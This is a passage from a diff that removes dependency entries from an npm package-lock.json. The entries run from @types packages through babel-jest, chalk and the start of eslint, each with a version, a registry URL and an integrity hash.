"dev": true, - "requires": { - "@types/node": "*" - } - }, - "@types/istanbul-lib-coverage": { - "version": "2.0.6", - "resolved": "https://registry.npmjs.org/@types/istanbul-lib-coverage/-/istanbul-lib-coverage-2.0.6.tgz", - "integrity": "sha512-2QF/t/auWm0lsy8XtKVPG19v3sSOQlJe/YHZgfjb/KBBHOGSV+J2q/S671rcq9uTBrLAXmZpqJiaQbMT+zNU1w==", - "dev": true - }, - "@types/istanbul-lib-report": { - "version": "3.0.3", - "resolved": "https://registry.npmjs.org/@types/istanbul-lib-report/-/istanbul-lib-report-3.0.3.tgz", - "integrity": "sha512-NQn7AHQnk/RSLOxrBbGyJM/aVQ+pjj5HCgasFxc0K/KhoATfQ/47AyUl15I2yBUpihjmas+a+VJBOqecrFH+uA==", - "dev": true, - "requires": { - "@types/istanbul-lib-coverage": "*" - } - }, - "@types/istanbul-reports": { - "version": "3.0.4", - "resolved": "https://registry.npmjs.org/@types/istanbul-reports/-/istanbul-reports-3.0.4.tgz", - "integrity": "sha512-pk2B1NWalF9toCRu6gjBzR69syFjP4Od8WRAX+0mmf9lAjCRicLOWc+ZrxZHx/0XRjotgkF9t6iaMJ+aXcOdZQ==", - "dev": true, - "requires": { - "@types/istanbul-lib-report": "*" - } - }, - "@types/node": { - "version": "22.10.1", - "resolved": "https://registry.npmjs.org/@types/node/-/node-22.10.1.tgz", - "integrity": "sha512-qKgsUwfHZV2WCWLAnVP1JqnpE6Im6h3Y0+fYgMTasNQ7V++CBX5OT1as0g0f+OyubbFqhf6XVNIsmN4IIhEgGQ==", - "dev": true, - "requires": { - "undici-types": "~6.20.0" - } - }, - "@types/parse-json": { - "version": "4.0.2", - "resolved": "https://registry.npmjs.org/@types/parse-json/-/parse-json-4.0.2.tgz", - "integrity": "sha512-dISoDXWWQwUquiKsyZ4Ng+HX2KsPL7LyHKHQwgGFEA3IaKac4Obd+h2a/a6waisAoepJlBcx9paWqjA8/HVjCw==", - "dev": true - }, - "@types/prettier": { - "version": "2.7.3", - "resolved": "https://registry.npmjs.org/@types/prettier/-/prettier-2.7.3.tgz", - "integrity": "sha512-+68kP9yzs4LMp7VNh8gdzMSPZFL44MLGqiHWvttYJe+6qnuVr4Ek9wSBQoveqY/r+LwjCcU29kNVkidwim+kYA==", - "dev": true, - "optional": true, - "peer": true - }, - "@types/stack-utils": { - "version": "2.0.3", - "resolved": "https://registry.npmjs.org/@types/stack-utils/-/stack-utils-2.0.3.tgz", - "integrity": "sha512-9aEbYZ3TbYMznPdcdr3SmIrLXwC/AKZXQeCf9Pgao5CKb8CyHuEX5jzWPTkvregvhRJHcpRO6BFoGW9ycaOkYw==", - "dev": true - }, - "@types/yargs": { - "version": "17.0.33", - "resolved": "https://registry.npmjs.org/@types/yargs/-/yargs-17.0.33.tgz", - "integrity": "sha512-WpxBCKWPLr4xSsHgz511rFJAM+wS28w2zEO1QDNY5zM/S8ok70NNfztH0xwhqKyaK0OHCbN98LDAZuy1ctxDkA==", - "dev": true, - "requires": { - "@types/yargs-parser": "*" - } - }, - "@types/yargs-parser": { - "version": "21.0.3", - "resolved": "https://registry.npmjs.org/@types/yargs-parser/-/yargs-parser-21.0.3.tgz", - "integrity": "sha512-I4q9QU9MQv4oEOz4tAHJtNz1cwuLxn2F3xcc2iV5WdqLPpUnj30aUuxt1mAxYTG+oe8CZMV/+6rU4S4gRDzqtQ==", - "dev": true - }, - "acorn": { - "version": "8.9.0", - "resolved": "https://registry.npmjs.org/acorn/-/acorn-8.9.0.tgz", - "integrity": "sha512-jaVNAFBHNLXspO543WnNNPZFRtavh3skAkITqD0/2aeMkKZTN+254PyhwxFYrk3vQ1xfY+2wbesJMs/JC8/PwQ==", - "dev": true, - "peer": true - }, - "acorn-jsx": { - "version": "5.3.2", - "resolved": "https://registry.npmjs.org/acorn-jsx/-/acorn-jsx-5.3.2.tgz", - "integrity": "sha512-rq9s+JNhf0IChjtDXxllJ7g41oZk5SlXtp0LHwyA5cejwn7vKmKp4pPri6YEePv2PU65sAsegbXtIinmDFDXgQ==", - "dev": true, - "peer": true, - "requires": {} - }, - "ajv": { - "version": "6.12.6", - "resolved": "https://registry.npmjs.org/ajv/-/ajv-6.12.6.tgz", - "integrity": "sha512-j3fVLgvTo527anyYyJOGTYJbG+vnnQYvE0m5mmkc1TK+nxAppkCLMIL0aZ4dblVCNoGShhm+kzE4ZUykBoMg4g==", - "requires": { - "fast-deep-equal": "^3.1.1", - "fast-json-stable-stringify": "^2.0.0", - "json-schema-traverse": "^0.4.1", - "uri-js": "^4.2.2" - } - }, - "ansi-escapes": { - "version": "4.3.2", - "resolved": "https://registry.npmjs.org/ansi-escapes/-/ansi-escapes-4.3.2.tgz", - "integrity": "sha512-gKXj5ALrKWQLsYG9jlTRmR/xKluxHV+Z9QEwNIgCfM1/uwPMCuzVVnh5mwTd+OuBZcwSIMbqssNWRm1lE51QaQ==", - "dev": true, - "requires": { - "type-fest": "^0.21.3" - }, - "dependencies": { - "type-fest": { - "version": "0.21.3", - "resolved": "https://registry.npmjs.org/type-fest/-/type-fest-0.21.3.tgz", - "integrity": "sha512-t0rzBq87m3fVcduHDUFhKmyyX+9eo6WQjZvf51Ea/M0Q7+T374Jp1aUiyUl0GKxp8M/OETVHSDvmkyPgvX+X2w==", - "dev": true - } - } - }, - "ansi-regex": { - "version": "5.0.1", - "resolved": "https://registry.npmjs.org/ansi-regex/-/ansi-regex-5.0.1.tgz", - "integrity": "sha512-quJQXlTSUGL2LH9SUXo8VwsY4soanhgo6LNSm84E1LBcE8s3O0wpdiRzyR9z/ZZJMlMWv37qOOb9pdJlMUEKFQ==" - }, - "ansi-styles": { - "version": "4.3.0", - "resolved": "https://registry.npmjs.org/ansi-styles/-/ansi-styles-4.3.0.tgz", - "integrity": "sha512-zbB9rCJAT1rbjiVDb2hqKFHNYLxgtk8NURxZ3IZwD3F6NtxbXZQCnnSi1Lkx+IDohdPlFp222wVALIheZJQSEg==", - "requires": { - "color-convert": "^2.0.1" - } - }, - "anymatch": { - "version": "3.1.3", - "resolved": "https://registry.npmjs.org/anymatch/-/anymatch-3.1.3.tgz", - "integrity": "sha512-KMReFUr0B4t+D+OBkjR3KYqvocp2XaSzO55UcB6mgQMd3KbcE+mWTyvVV7D/zsdEbNnV6acZUutkiHQXvTr1Rw==", - "dev": true, - "requires": { - "normalize-path": "^3.0.0", - "picomatch": "^2.0.4" - } - }, - "argparse": { - "version": "2.0.1", - "resolved": "https://registry.npmjs.org/argparse/-/argparse-2.0.1.tgz", - "integrity": "sha512-8+9WqebbFzpX9OR+Wa6O29asIogeRMzcGtAINdpMHHyAg10f05aSFVBbcEqGf/PXw1EjAZ+q2/bEBg3DvurK3Q==" - }, - "asn1": { - "version": "0.2.6", - "resolved": "https://registry.npmjs.org/asn1/-/asn1-0.2.6.tgz", - "integrity": "sha512-ix/FxPn0MDjeyJ7i/yoHGFt/EX6LyNbxSEhPPXODPL+KB0VPk86UYfL0lMdy+KCnv+fmvIzySwaK5COwqVbWTQ==", - "requires": { - "safer-buffer": "~2.1.0" - } - }, - "assert-plus": { - "version": "1.0.0", - "resolved": "https://registry.npmjs.org/assert-plus/-/assert-plus-1.0.0.tgz", - "integrity": "sha512-NfJ4UzBCcQGLDlQq7nHxH+tv3kyZ0hHQqF5BO6J7tNJeP5do1llPr8dZ8zHonfhAu0PHAdMkSo+8o0wxg9lZWw==" - }, - "asynckit": { - "version": "0.4.0", - "resolved": "https://registry.npmjs.org/asynckit/-/asynckit-0.4.0.tgz", - "integrity": "sha512-Oei9OH4tRh0YqU3GxhX79dM/mwVgvbZJaSNaRk+bshkj0S5cfHcgYakreBjrHwatXKbz+IoIdYLxrKim2MjW0Q==" - }, - "aws-sign2": { - "version": "0.7.0", - "resolved": "https://registry.npmjs.org/aws-sign2/-/aws-sign2-0.7.0.tgz", - "integrity": "sha512-08kcGqnYf/YmjoRhfxyu+CLxBjUtHLXLXX/vUfx9l2LYzG3c1m61nrpyFUZI6zeS+Li/wWMMidD9KgrqtGq3mA==" - }, - "aws4": { - "version": "1.12.0", - "resolved": "https://registry.npmjs.org/aws4/-/aws4-1.12.0.tgz", - "integrity": "sha512-NmWvPnx0F1SfrQbYwOi7OeaNGokp9XhzNioJ/CSBs8Qa4vxug81mhJEAVZwxXuBmYB5KDRfMq/F3RR0BIU7sWg==" - }, - "babel-jest": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/babel-jest/-/babel-jest-29.7.0.tgz", - "integrity": "sha512-BrvGY3xZSwEcCzKvKsCi2GgHqDqsYkOP4/by5xCgIwGXQxIEh+8ew3gmrE1y7XRR6LHZIj6yLYnUi/mm2KXKBg==", - "dev": true, - "requires": { - "@jest/transform": "^29.7.0", - "@types/babel__core": "^7.1.14", - "babel-plugin-istanbul": "^6.1.1", - "babel-preset-jest": "^29.6.3", - "chalk": "^4.0.0", - "graceful-fs": "^4.2.9", - "slash": "^3.0.0" - } - }, - "babel-plugin-istanbul": { - "version": "6.1.1", - "resolved": "https://registry.npmjs.org/babel-plugin-istanbul/-/babel-plugin-istanbul-6.1.1.tgz", - "integrity": "sha512-Y1IQok9821cC9onCx5otgFfRm7Lm+I+wwxOx738M/WLPZ9Q42m4IG5W0FNX8WLL2gYMZo3JkuXIH2DOpWM+qwA==", - "dev": true, - "requires": { - "@babel/helper-plugin-utils": "^7.0.0", - "@istanbuljs/load-nyc-config": "^1.0.0", - "@istanbuljs/schema": "^0.1.2", - "istanbul-lib-instrument": "^5.0.4", - "test-exclude": "^6.0.0" - }, - "dependencies": { - "istanbul-lib-instrument": { - "version": "5.2.1", - "resolved": "https://registry.npmjs.org/istanbul-lib-instrument/-/istanbul-lib-instrument-5.2.1.tgz", - "integrity": "sha512-pzqtp31nLv/XFOzXGuvhCb8qhjmTVo5vjVk19XE4CRlSWz0KoeJ3bw9XsA7nOp9YBf4qHjwBxkDzKcME/J29Yg==", - "dev": true, - "requires": { - "@babel/core": "^7.12.3", - "@babel/parser": "^7.14.7", - "@istanbuljs/schema": "^0.1.2", - "istanbul-lib-coverage": "^3.2.0", - "semver": "^6.3.0" - } - } - } - }, - "babel-plugin-jest-hoist": { - "version": "29.6.3", - "resolved": "https://registry.npmjs.org/babel-plugin-jest-hoist/-/babel-plugin-jest-hoist-29.6.3.tgz", - "integrity": "sha512-ESAc/RJvGTFEzRwOTT4+lNDk/GNHMkKbNzsvT0qKRfDyyYTskxB5rnU2njIDYVxXCBHHEI1c0YwHob3WaYujOg==", - "dev": true, - "requires": { - "@babel/template": "^7.3.3", - "@babel/types": "^7.3.3", - "@types/babel__core": "^7.1.14", - "@types/babel__traverse": "^7.0.6" - } - }, - "babel-preset-current-node-syntax": { - "version": "1.1.0", - "resolved": "https://registry.npmjs.org/babel-preset-current-node-syntax/-/babel-preset-current-node-syntax-1.1.0.tgz", - "integrity": "sha512-ldYss8SbBlWva1bs28q78Ju5Zq1F+8BrqBZZ0VFhLBvhh6lCpC2o3gDJi/5DRLs9FgYZCnmPYIVFU4lRXCkyUw==", - "dev": true, - "requires": { - "@babel/plugin-syntax-async-generators": "^7.8.4", - "@babel/plugin-syntax-bigint": "^7.8.3", - "@babel/plugin-syntax-class-properties": "^7.12.13", - "@babel/plugin-syntax-class-static-block": "^7.14.5", - "@babel/plugin-syntax-import-attributes": "^7.24.7", - "@babel/plugin-syntax-import-meta": "^7.10.4", - "@babel/plugin-syntax-json-strings": "^7.8.3", - "@babel/plugin-syntax-logical-assignment-operators": "^7.10.4", - "@babel/plugin-syntax-nullish-coalescing-operator": "^7.8.3", - "@babel/plugin-syntax-numeric-separator": "^7.10.4", - "@babel/plugin-syntax-object-rest-spread": "^7.8.3", - "@babel/plugin-syntax-optional-catch-binding": "^7.8.3", - "@babel/plugin-syntax-optional-chaining": "^7.8.3", - "@babel/plugin-syntax-private-property-in-object": "^7.14.5", - "@babel/plugin-syntax-top-level-await": "^7.14.5" - } - }, - "babel-preset-jest": { - "version": "29.6.3", - "resolved": "https://registry.npmjs.org/babel-preset-jest/-/babel-preset-jest-29.6.3.tgz", - "integrity": "sha512-0B3bhxR6snWXJZtR/RliHTDPRgn1sNHOR0yVtq/IiQFyuOVjFS+wuio/R4gSNkyYmKmJB4wGZv2NZanmKmTnNA==", - "dev": true, - "requires": { - "babel-plugin-jest-hoist": "^29.6.3", - "babel-preset-current-node-syntax": "^1.0.0" - } - }, - "balanced-match": { - "version": "1.0.2", - "resolved": "https://registry.npmjs.org/balanced-match/-/balanced-match-1.0.2.tgz", - "integrity": "sha512-3oSeUO0TMV67hN1AmbXsK4yaqU7tjiHlbxRDZOpH0KW9+CeX4bRAaX0Anxt0tx2MrpRpWwQaPwIlISEJhYU5Pw==" - }, - "bcrypt-pbkdf": { - "version": "1.0.2", - "resolved": "https://registry.npmjs.org/bcrypt-pbkdf/-/bcrypt-pbkdf-1.0.2.tgz", - "integrity": "sha512-qeFIXtP4MSoi6NLqO12WfqARWWuCKi2Rn/9hJLEmtB5yTNr9DqFWkJRCf2qShWzPeAMRnOgCrq0sg/KLv5ES9w==", - "requires": { - "tweetnacl": "^0.14.3" - } - }, - "brace-expansion": { - "version": "1.1.11", - "resolved": "https://registry.npmjs.org/brace-expansion/-/brace-expansion-1.1.11.tgz", - "integrity": "sha512-iCuPHDFgrHX7H2vEI/5xpz07zSHB00TpugqhmYtVmMO6518mCuRMoOYFldEBl0g187ufozdaHgWKcYFb61qGiA==", - "dev": true, - "requires": { - "balanced-match": "^1.0.0", - "concat-map": "0.0.1" - } - }, - "braces": { - "version": "3.0.3", - "resolved": "https://registry.npmjs.org/braces/-/braces-3.0.3.tgz", - "integrity": "sha512-yQbXgO/OSZVD2IsiLlro+7Hf6Q18EJrKSEsdoMzKePKXct3gvD8oLcOQdIzGupr5Fj+EDe8gO/lxc1BzfMpxvA==", - "dev": true, - "requires": { - "fill-range": "^7.1.1" - } - }, - "browserslist": { - "version": "4.24.2", - "resolved": "https://registry.npmjs.org/browserslist/-/browserslist-4.24.2.tgz", - "integrity": "sha512-ZIc+Q62revdMcqC6aChtW4jz3My3klmCO1fEmINZY/8J3EpBg5/A/D0AKmBveUh6pgoeycoMkVMko84tuYS+Gg==", - "dev": true, - "requires": { - "caniuse-lite": "^1.0.30001669", - "electron-to-chromium": "^1.5.41", - "node-releases": "^2.0.18", - "update-browserslist-db": "^1.1.1" - } - }, - "bser": { - "version": "2.1.1", - "resolved": "https://registry.npmjs.org/bser/-/bser-2.1.1.tgz", - "integrity": "sha512-gQxTNE/GAfIIrmHLUE3oJyp5FO6HRBfhjnw4/wMmA63ZGDJnWBmgY/lyQBpnDUkGmAhbSe39tx2d/iTOAfglwQ==", - "dev": true, - "requires": { - "node-int64": "^0.4.0" - } - }, - "buffer-from": { - "version": "1.1.2", - "resolved": "https://registry.npmjs.org/buffer-from/-/buffer-from-1.1.2.tgz", - "integrity": "sha512-E+XQCRwSbaaiChtv6k6Dwgc+bx+Bs6vuKJHHl5kox/BaKbhiXzqQOwK4cO22yElGp2OCmjwVhT3HmxgyPGnJfQ==", - "dev": true - }, - "byline": { - "version": "5.0.0", - "resolved": "https://registry.npmjs.org/byline/-/byline-5.0.0.tgz", - "integrity": "sha512-s6webAy+R4SR8XVuJWt2V2rGvhnrhxN+9S15GNuTK3wKPOXFF6RNc+8ug2XhH+2s4f+uudG4kUVYmYOQWL2g0Q==" - }, - "callsites": { - "version": "3.1.0", - "resolved": "https://registry.npmjs.org/callsites/-/callsites-3.1.0.tgz", - "integrity": "sha512-P8BjAsXvZS+VIDUI11hHCQEv74YT67YUi5JJFNWIqL235sBmjX4+qx9Muvls5ivyNENctx46xQLQ3aTuE7ssaQ==", - "dev": true - }, - "camelcase": { - "version": "5.3.1", - "resolved": "https://registry.npmjs.org/camelcase/-/camelcase-5.3.1.tgz", - "integrity": "sha512-L28STB170nwWS63UjtlEOE3dldQApaJXZkOI1uMFfzf3rRuPegHaHesyee+YxQ+W6SvRDQV6UrdOdRiR153wJg==", - "dev": true - }, - "caniuse-lite": { - "version": "1.0.30001680", - "resolved": "https://registry.npmjs.org/caniuse-lite/-/caniuse-lite-1.0.30001680.tgz", - "integrity": "sha512-rPQy70G6AGUMnbwS1z6Xg+RkHYPAi18ihs47GH0jcxIG7wArmPgY3XbS2sRdBbxJljp3thdT8BIqv9ccCypiPA==", - "dev": true - }, - "caseless": { - "version": "0.12.0", - "resolved": "https://registry.npmjs.org/caseless/-/caseless-0.12.0.tgz", - "integrity": "sha512-4tYFyifaFfGacoiObjJegolkwSU4xQNGbVgUiNYVUxbQ2x2lUsFvY4hVgVzGiIe6WLOPqycWXA40l+PWsxthUw==" - }, - "chalk": { - "version": "4.1.2", - "resolved": "https://registry.npmjs.org/chalk/-/chalk-4.1.2.tgz", - "integrity": "sha512-oKnbhFyRIXpUuez8iBMmyEa4nbj4IOQyuhc/wy9kY7/WVPcwIO9VA668Pu8RkO7+0G76SLROeyw9CpQ061i4mA==", - "dev": true, - "requires": { - "ansi-styles": "^4.1.0", - "supports-color": "^7.1.0" - } - }, - "char-regex": { - "version": "1.0.2", - "resolved": "https://registry.npmjs.org/char-regex/-/char-regex-1.0.2.tgz", - "integrity": "sha512-kWWXztvZ5SBQV+eRgKFeh8q5sLuZY2+8WUIzlxWVTg+oGwY14qylx1KbKzHd8P6ZYkAg0xyIDU9JMHhyJMZ1jw==", - "dev": true - }, - "chownr": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/chownr/-/chownr-3.0.0.tgz", - "integrity": "sha512-+IxzY9BZOQd/XuYPRmrvEVjF/nqj5kgT4kEq7VofrDoM1MxoRjEWkrCC3EtLi59TVawxTAn+orJwFQcrqEN1+g==" - }, - "ci-info": { - "version": "3.9.0", - "resolved": "https://registry.npmjs.org/ci-info/-/ci-info-3.9.0.tgz", - "integrity": "sha512-NIxF55hv4nSqQswkAeiOi1r83xy8JldOFDTWiug55KBu9Jnblncd2U6ViHmYgHf01TPZS77NJBhBMKdWj9HQMQ==", - "dev": true - }, - "cjs-module-lexer": { - "version": "1.4.1", - "resolved": "https://registry.npmjs.org/cjs-module-lexer/-/cjs-module-lexer-1.4.1.tgz", - "integrity": "sha512-cuSVIHi9/9E/+821Qjdvngor+xpnlwnuwIyZOaLmHBVdXL+gP+I6QQB9VkO7RI77YIcTV+S1W9AreJ5eN63JBA==", - "dev": true - }, - "cliui": { - "version": "8.0.1", - "resolved": "https://registry.npmjs.org/cliui/-/cliui-8.0.1.tgz", - "integrity": "sha512-BSeNnyus75C4//NQ9gQt1/csTXyo/8Sb+afLAkzAptFuMsod9HFokGNudZpi/oQV73hnVK+sR+5PVRMd+Dr7YQ==", - "dev": true, - "requires": { - "string-width": "^4.2.0", - "strip-ansi": "^6.0.1", - "wrap-ansi": "^7.0.0" - } - }, - "co": { - "version": "4.6.0", - "resolved": "https://registry.npmjs.org/co/-/co-4.6.0.tgz", - "integrity": "sha512-QVb0dM5HvG+uaxitm8wONl7jltx8dqhfU33DcqtOZcLSVIKSDDLDi7+0LbAKiyI8hD9u42m2YxXSkMGWThaecQ==", - "dev": true - }, - "collect-v8-coverage": { - "version": "1.0.2", - "resolved": "https://registry.npmjs.org/collect-v8-coverage/-/collect-v8-coverage-1.0.2.tgz", - "integrity": "sha512-lHl4d5/ONEbLlJvaJNtsF/Lz+WvB07u2ycqTYbdrq7UypDXailES4valYb2eWiJFxZlVmpGekfqoxQhzyFdT4Q==", - "dev": true - }, - "color-convert": { - "version": "2.0.1", - "resolved": "https://registry.npmjs.org/color-convert/-/color-convert-2.0.1.tgz", - "integrity": "sha512-RRECPsj7iu/xb5oKYcsFHSppFNnsj/52OVTRKb4zP5onXwVF3zVmmToNcOfGC+CRDpfK/U584fMg38ZHCaElKQ==", - "requires": { - "color-name": "~1.1.4" - } - }, - "color-name": { - "version": "1.1.4", - "resolved": "https://registry.npmjs.org/color-name/-/color-name-1.1.4.tgz", - "integrity": "sha512-dOy+3AuW3a2wNbZHIuMZpTcgjGuLU/uBL/ubcZF9OXbDo8ff4O8yVp5Bf0efS8uEoYo5q4Fx7dY9OgQGXgAsQA==" - }, - "combined-stream": { - "version": "1.0.8", - "resolved": "https://registry.npmjs.org/combined-stream/-/combined-stream-1.0.8.tgz", - "integrity": "sha512-FQN4MRfuJeHf7cBbBMJFXhKSDq+2kAArBlmRBvcvFE5BB1HZKXtSFASDhdlz9zOYwxh8lDdnvmMOe/+5cdoEdg==", - "requires": { - "delayed-stream": "~1.0.0" - } - }, - "concat-map": { - "version": "0.0.1", - "resolved": "https://registry.npmjs.org/concat-map/-/concat-map-0.0.1.tgz", - "integrity": "sha512-/Srv4dswyQNBfohGpz9o6Yb3Gz3SrUDqBH5rTuhGR7ahtlbYKnVxw2bCFMRljaA7EXHaXZ8wsHdodFvbkhKmqg==", - "dev": true - }, - "convert-source-map": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/convert-source-map/-/convert-source-map-2.0.0.tgz", - "integrity": "sha512-Kvp459HrV2FEJ1CAsi1Ku+MY3kasH19TFykTz2xWmMeq6bk2NU3XXvfJ+Q61m0xktWwt+1HSYf3JZsTms3aRJg==", - "dev": true - }, - "core-util-is": { - "version": "1.0.2", - "resolved": "https://registry.npmjs.org/core-util-is/-/core-util-is-1.0.2.tgz", - "integrity": "sha512-3lqz5YjWTYnW6dlDa5TLaTCcShfar1e40rmcJVwCBJC6mWlFuj0eCHIElmG1g5kyuJ/GD+8Wn4FFCcz4gJPfaQ==" - }, - "cosmiconfig": { - "version": "7.1.0", - "resolved": "https://registry.npmjs.org/cosmiconfig/-/cosmiconfig-7.1.0.tgz", - "integrity": "sha512-AdmX6xUzdNASswsFtmwSt7Vj8po9IuqXm0UXz7QKPuEUmPB4XyjGfaAr2PSuELMwkRMVH1EpIkX5bTZGRB3eCA==", - "dev": true, - "requires": { - "@types/parse-json": "^4.0.0", - "import-fresh": "^3.2.1", - "parse-json": "^5.0.0", - "path-type": "^4.0.0", - "yaml": "^1.10.0" - } - }, - "create-jest": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/create-jest/-/create-jest-29.7.0.tgz", - "integrity": "sha512-Adz2bdH0Vq3F53KEMJOoftQFutWCukm6J24wbPWRO4k1kMY7gS7ds/uoJkNuV8wDCtWWnuwGcJwpWcih+zEW1Q==", - "dev": true, - "requires": { - "@jest/types": "^29.6.3", - "chalk": "^4.0.0", - "exit": "^0.1.2", - "graceful-fs": "^4.2.9", - "jest-config": "^29.7.0", - "jest-util": "^29.7.0", - "prompts": "^2.0.1" - } - }, - "cross-spawn": { - "version": "7.0.6", - "resolved": "https://registry.npmjs.org/cross-spawn/-/cross-spawn-7.0.6.tgz", - "integrity": "sha512-uV2QOWP2nWzsy2aMp8aRibhi9dlzF5Hgh5SHaB9OiTGEyDTiJJyx0uy51QXdyWbtAHNua4XJzUKca3OzKUd3vA==", - "requires": { - "path-key": "^3.1.0", - "shebang-command": "^2.0.0", - "which": "^2.0.1" - } - }, - "dashdash": { - "version": "1.14.1", - "resolved": "https://registry.npmjs.org/dashdash/-/dashdash-1.14.1.tgz", - "integrity": "sha512-jRFi8UDGo6j+odZiEpjazZaWqEal3w/basFjQHQEwVtZJGDpxbH1MeYluwCS8Xq5wmLJooDlMgvVarmWfGM44g==", - "requires": { - "assert-plus": "^1.0.0" - } - }, - "debug": { - "version": "4.3.4", - "resolved": "https://registry.npmjs.org/debug/-/debug-4.3.4.tgz", - "integrity": "sha512-PRWFHuSU3eDtQJPvnNY7Jcket1j0t5OuOsFzPPzsekD52Zl8qUfFIPEiswXqIvHWGVHOgX+7G/vCNNhehwxfkQ==", - "dev": true, - "requires": { - "ms": "2.1.2" - } - }, - "dedent": { - "version": "1.5.3", - "resolved": "https://registry.npmjs.org/dedent/-/dedent-1.5.3.tgz", - "integrity": "sha512-NHQtfOOW68WD8lgypbLA5oT+Bt0xXJhiYvoR6SmmNXZfpzOGXwdKWmcwG8N7PwVVWV3eF/68nmD9BaJSsTBhyQ==", - "dev": true, - "requires": {} - }, - "deep-is": { - "version": "0.1.4", - "resolved": "https://registry.npmjs.org/deep-is/-/deep-is-0.1.4.tgz", - "integrity": "sha512-oIPzksmTg4/MriiaYGO+okXDT7ztn/w3Eptv/+gSIdMdKsJo0u4CfYNFJPy+4SKMuCqGw2wxnA+URMg3t8a/bQ==", - "dev": true, - "peer": true - }, - "deepmerge": { - "version": "4.3.1", - "resolved": "https://registry.npmjs.org/deepmerge/-/deepmerge-4.3.1.tgz", - "integrity": "sha512-3sUqbMEc77XqpdNO7FRyRog+eW3ph+GYCbj+rK+uYyRMuwsVy0rMiVtPn+QJlKFvWP/1PYpapqYn0Me2knFn+A==", - "dev": true - }, - "delayed-stream": { - "version": "1.0.0", - "resolved": "https://registry.npmjs.org/delayed-stream/-/delayed-stream-1.0.0.tgz", - "integrity": "sha512-ZySD7Nf91aLB0RxL4KGrKHBXl7Eds1DAmEdcoVawXnLD7SDhpNgtuII2aAkg7a7QS41jxPSZ17p4VdGnMHk3MQ==" - }, - "detect-newline": { - "version": "3.1.0", - "resolved": "https://registry.npmjs.org/detect-newline/-/detect-newline-3.1.0.tgz", - "integrity": "sha512-TLz+x/vEXm/Y7P7wn1EJFNLxYpUD4TgMosxY6fAVJUnJMbupHBOncxyWUG9OpTaH9EBD7uFI5LfEgmMOc54DsA==", - "dev": true - }, - "diff-sequences": { - "version": "29.6.3", - "resolved": "https://registry.npmjs.org/diff-sequences/-/diff-sequences-29.6.3.tgz", - "integrity": "sha512-EjePK1srD3P08o2j4f0ExnylqRs5B9tJjcp9t1krH2qRi8CCdsYfwe9JgSLurFBWwq4uOlipzfk5fHNvwFKr8Q==", - "dev": true - }, - "doctrine": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/doctrine/-/doctrine-3.0.0.tgz", - "integrity": "sha512-yS+Q5i3hBf7GBkd4KG8a7eBNNWNGLTaEwwYWUijIYM7zrlYDM0BFXHjjPWlWZ1Rg7UaddZeIDmi9jF3HmqiQ2w==", - "dev": true, - "peer": true, - "requires": { - "esutils": "^2.0.2" - } - }, - "dot-prop": { - "version": "6.0.1", - "resolved": "https://registry.npmjs.org/dot-prop/-/dot-prop-6.0.1.tgz", - "integrity": "sha512-tE7ztYzXHIeyvc7N+hR3oi7FIbf/NIjVP9hmAt3yMXzrQ072/fpjGLx2GxNxGxUl5V73MEqYzioOMoVhGMJ5cA==", - "dev": true, - "requires": { - "is-obj": "^2.0.0" - } - }, - "eastasianwidth": { - "version": "0.2.0", - "resolved": "https://registry.npmjs.org/eastasianwidth/-/eastasianwidth-0.2.0.tgz", - "integrity": "sha512-I88TYZWc9XiYHRQ4/3c5rjjfgkjhLyW2luGIheGERbNQ6OY7yTybanSpDXZa8y7VUP9YmDcYa+eyq4ca7iLqWA==" - }, - "ecc-jsbn": { - "version": "0.1.2", - "resolved": "https://registry.npmjs.org/ecc-jsbn/-/ecc-jsbn-0.1.2.tgz", - "integrity": "sha512-eh9O+hwRHNbG4BLTjEl3nw044CkGm5X6LoaCf7LPp7UU8Qrt47JYNi6nPX8xjW97TKGKm1ouctg0QSpZe9qrnw==", - "requires": { - "jsbn": "~0.1.0", - "safer-buffer": "^2.1.0" - } - }, - "electron-to-chromium": { - "version": "1.5.63", - "resolved": "https://registry.npmjs.org/electron-to-chromium/-/electron-to-chromium-1.5.63.tgz", - "integrity": "sha512-ddeXKuY9BHo/mw145axlyWjlJ1UBt4WK3AlvkT7W2AbqfRQoacVoRUCF6wL3uIx/8wT9oLKXzI+rFqHHscByaA==", - "dev": true - }, - "emittery": { - "version": "0.13.1", - "resolved": "https://registry.npmjs.org/emittery/-/emittery-0.13.1.tgz", - "integrity": "sha512-DeWwawk6r5yR9jFgnDKYt4sLS0LmHJJi3ZOnb5/JdbYwj3nW+FxQnHIjhBKz8YLC7oRNPVM9NQ47I3CVx34eqQ==", - "dev": true - }, - "emoji-regex": { - "version": "8.0.0", - "resolved": "https://registry.npmjs.org/emoji-regex/-/emoji-regex-8.0.0.tgz", - "integrity": "sha512-MSjYzcWNOA0ewAHpz0MxpYFvwg6yjy1NG3xteoqz644VCo/RPgnr1/GGt+ic3iJTzQ8Eu3TdM14SawnVUmGE6A==" - }, - "error-ex": { - "version": "1.3.2", - "resolved": "https://registry.npmjs.org/error-ex/-/error-ex-1.3.2.tgz", - "integrity": "sha512-7dFHNmqeFSEt2ZBsCriorKnn3Z2pj+fd9kmI6QoWw4//DL+icEBfc0U7qJCisqrTsKTjw4fNFy2pW9OqStD84g==", - "dev": true, - "requires": { - "is-arrayish": "^0.2.1" - } - }, - "escalade": { - "version": "3.2.0", - "resolved": "https://registry.npmjs.org/escalade/-/escalade-3.2.0.tgz", - "integrity": "sha512-WUj2qlxaQtO4g6Pq5c29GTcWGDyd8itL8zTlipgECz3JesAiiOKotd8JU6otB3PACgG6xkJUyVhboMS+bje/jA==", - "dev": true - }, - "escape-string-regexp": { - "version": "4.0.0", - "resolved": "https://registry.npmjs.org/escape-string-regexp/-/escape-string-regexp-4.0.0.tgz", - "integrity": "sha512-TtpcNJ3XAzx3Gq8sWRzJaVajRs0uVxA2YAkdb1jm2YkPz4G6egUFAyA3n5vtEIZefPk5Wa4UXbKuS5fKkJWdgA==", - "dev": true, - "peer": true - }, - "eslint": { - "version": "8.44.0", - "resolved": "https://registry.npmjs.org/eslint/-/eslint-8.44.0.tgz", - "integrity": "sha512-0wpHoUbDUHgNCyvFB5aXLiQVfK9B0at6gUvzy83k4kAsQ/u769TQDX6iKC+aO4upIHO9WSaA3QoXYQDHbNwf1A==", - "dev": true, - "peer": true, - "requires": { - "@eslint-community/eslint-utils": "^4.2.0", - "@eslint-community/regexpp": "^4.4.0", - "@eslint/eslintrc": 